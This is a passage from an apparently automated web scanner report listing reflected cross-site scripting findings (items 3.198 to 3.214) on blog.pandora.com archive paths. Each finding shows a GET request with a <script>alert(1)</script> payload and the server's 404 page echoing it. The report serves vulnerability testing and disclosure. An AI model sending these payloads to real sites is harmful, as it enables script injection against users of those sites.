Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:32 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora7af11<script>alert(1)</script>1a13f4a03d2/archives/2009/04/ was not found on this server.</p>
...[SNIP]...

3.198. http://blog.pandora.com/pandora/archives/2009/04/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2009/04/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload beaf3<script>alert(1)</script>b750ded26f8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesbeaf3<script>alert(1)</script>b750ded26f8/2009/04/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:34 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesbeaf3<script>alert(1)</script>b750ded26f8/2009/04/ was not found on this server.</p>
...[SNIP]...

3.199. http://blog.pandora.com/pandora/archives/2009/04/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2009/04/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 68bf4<script>alert(1)</script>2d188b48660 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/200968bf4<script>alert(1)</script>2d188b48660/04/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:36 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/200968bf4<script>alert(1)</script>2d188b48660/04/ was not found on this server.</p>
...[SNIP]...

3.200. http://blog.pandora.com/pandora/archives/2009/04/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2009/04/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7adfa<script>alert(1)</script>b1f6f7ee47a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2009/047adfa<script>alert(1)</script>b1f6f7ee47a/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:39 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2009/047adfa<script>alert(1)</script>b1f6f7ee47a/ was not found on this server.</p>
...[SNIP]...

3.201. http://blog.pandora.com/pandora/archives/2009/05/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2009/05/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ee40e<script>alert(1)</script>6dc1333d8df was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandoraee40e<script>alert(1)</script>6dc1333d8df/archives/2009/05/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:30 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandoraee40e<script>alert(1)</script>6dc1333d8df/archives/2009/05/ was not found on this server.</p>
...[SNIP]...

3.202. http://blog.pandora.com/pandora/archives/2009/05/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2009/05/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 83b92<script>alert(1)</script>91c0dbd346e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives83b92<script>alert(1)</script>91c0dbd346e/2009/05/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:33 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives83b92<script>alert(1)</script>91c0dbd346e/2009/05/ was not found on this server.</p>
...[SNIP]...

3.203. http://blog.pandora.com/pandora/archives/2009/05/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2009/05/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7b54d<script>alert(1)</script>4def9d0af6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/20097b54d<script>alert(1)</script>4def9d0af6/05/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:35 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 348
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20097b54d<script>alert(1)</script>4def9d0af6/05/ was not found on this server.</p>
...[SNIP]...

3.204. http://blog.pandora.com/pandora/archives/2009/05/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2009/05/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4fdb9<script>alert(1)</script>8f219a229f4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2009/054fdb9<script>alert(1)</script>8f219a229f4/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:38 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2009/054fdb9<script>alert(1)</script>8f219a229f4/ was not found on this server.</p>
...[SNIP]...

3.205. http://blog.pandora.com/pandora/archives/2009/06/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2009/06/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5ddb1<script>alert(1)</script>d964ffd68f4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora5ddb1<script>alert(1)</script>d964ffd68f4/archives/2009/06/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:30 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora5ddb1<script>alert(1)</script>d964ffd68f4/archives/2009/06/ was not found on this server.</p>
...[SNIP]...

3.206. http://blog.pandora.com/pandora/archives/2009/06/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2009/06/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 40560<script>alert(1)</script>8295fb9672e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives40560<script>alert(1)</script>8295fb9672e/2009/06/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:32 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives40560<script>alert(1)</script>8295fb9672e/2009/06/ was not found on this server.</p>
...[SNIP]...

3.207. http://blog.pandora.com/pandora/archives/2009/06/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2009/06/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 35d6a<script>alert(1)</script>61d8424a6b1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/200935d6a<script>alert(1)</script>61d8424a6b1/06/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:34 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/200935d6a<script>alert(1)</script>61d8424a6b1/06/ was not found on this server.</p>
...[SNIP]...

3.208. http://blog.pandora.com/pandora/archives/2009/06/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2009/06/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6dc78<script>alert(1)</script>f9f9f8b2891 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2009/066dc78<script>alert(1)</script>f9f9f8b2891/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:37 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2009/066dc78<script>alert(1)</script>f9f9f8b2891/ was not found on this server.</p>
...[SNIP]...

3.209. http://blog.pandora.com/pandora/archives/2009/07/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2009/07/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ea0d3<script>alert(1)</script>7e8e5ab80a9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandoraea0d3<script>alert(1)</script>7e8e5ab80a9/archives/2009/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:32 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandoraea0d3<script>alert(1)</script>7e8e5ab80a9/archives/2009/07/ was not found on this server.</p>
...[SNIP]...

3.210. http://blog.pandora.com/pandora/archives/2009/07/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2009/07/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e6355<script>alert(1)</script>dcc343d2bd0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivese6355<script>alert(1)</script>dcc343d2bd0/2009/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:34 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivese6355<script>alert(1)</script>dcc343d2bd0/2009/07/ was not found on this server.</p>
...[SNIP]...

3.211. http://blog.pandora.com/pandora/archives/2009/07/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2009/07/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload bdd32<script>alert(1)</script>e2655d97c30 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2009bdd32<script>alert(1)</script>e2655d97c30/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:36 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2009bdd32<script>alert(1)</script>e2655d97c30/07/ was not found on this server.</p>
...[SNIP]...

3.212. http://blog.pandora.com/pandora/archives/2009/07/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2009/07/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b55f0<script>alert(1)</script>a60f65ec066 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2009/07b55f0<script>alert(1)</script>a60f65ec066/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:39 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2009/07b55f0<script>alert(1)</script>a60f65ec066/ was not found on this server.</p>
...[SNIP]...

3.213. http://blog.pandora.com/pandora/archives/2009/08/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2009/08/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9cddd<script>alert(1)</script>c07d7b6b6e1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora9cddd<script>alert(1)</script>c07d7b6b6e1/archives/2009/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:33 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora9cddd<script>alert(1)</script>c07d7b6b6e1/archives/2009/08/ was not found on this server.</p>
...[SNIP]...

3.214. http://blog.pandora.com/pandora/archives/2009/08/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2009/08/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9fc45<script>alert(1)</script>73d64655690 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives9fc45<script>alert(1)</script>73d64655690/2009/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
